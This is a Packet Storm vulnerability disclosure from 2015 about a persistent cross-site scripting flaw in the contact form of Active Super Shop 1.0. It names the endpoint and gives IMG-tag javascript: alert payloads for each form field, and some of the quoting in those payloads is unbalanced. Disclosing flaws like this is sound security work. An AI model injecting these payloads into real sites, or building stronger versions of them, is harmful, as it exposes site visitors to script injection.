Active Super Shop 1.0 Cross Site Scripting

2015-07-19T00:00:00
ID PACKETSTORM:132749
Type packetstorm
Reporter Angelo Ruwantha
Modified 2015-07-19T00:00:00

Description

                                        
                                            `# Exploit Title:Active Super Shop Persistent XSS  
# Date: Fri July 17 2015  
# Exploit Author: Angelo Ruwantha  
# Vendor Homepage: http://activeitzone.com/  
# Version:1.0  
# Tested on: archlinux  
  
Vulnerability(persistent XSS)  
========================  
contact form fields vulnerable to persistent xss.  
[+]Method:POST  
  
1.http://URL/index.php/home/contact/ (;persistent XSS)  
  
name=<IMG SRC="javascript:alert('HEY;)');  
&email=<IMG SRC="javascript:alert('another script;)');  
&subject=<IMG SRC="javascript:alert('every parameter;)');  
&message=<IMG SRC="javascript:alert('injectable;)');  
  
`